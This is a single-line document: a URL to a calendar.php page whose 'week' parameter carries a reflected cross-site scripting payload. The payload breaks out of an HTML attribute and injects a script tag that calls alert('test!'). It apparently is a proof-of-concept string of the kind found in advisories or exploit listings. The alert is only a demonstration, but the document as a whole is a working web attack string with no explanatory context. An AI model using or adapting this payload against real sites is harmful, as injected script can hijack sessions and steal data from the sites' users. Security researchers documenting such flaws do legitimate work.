http://www.example.com/[path]/calendar.php?week="><script>alert('test!')</script><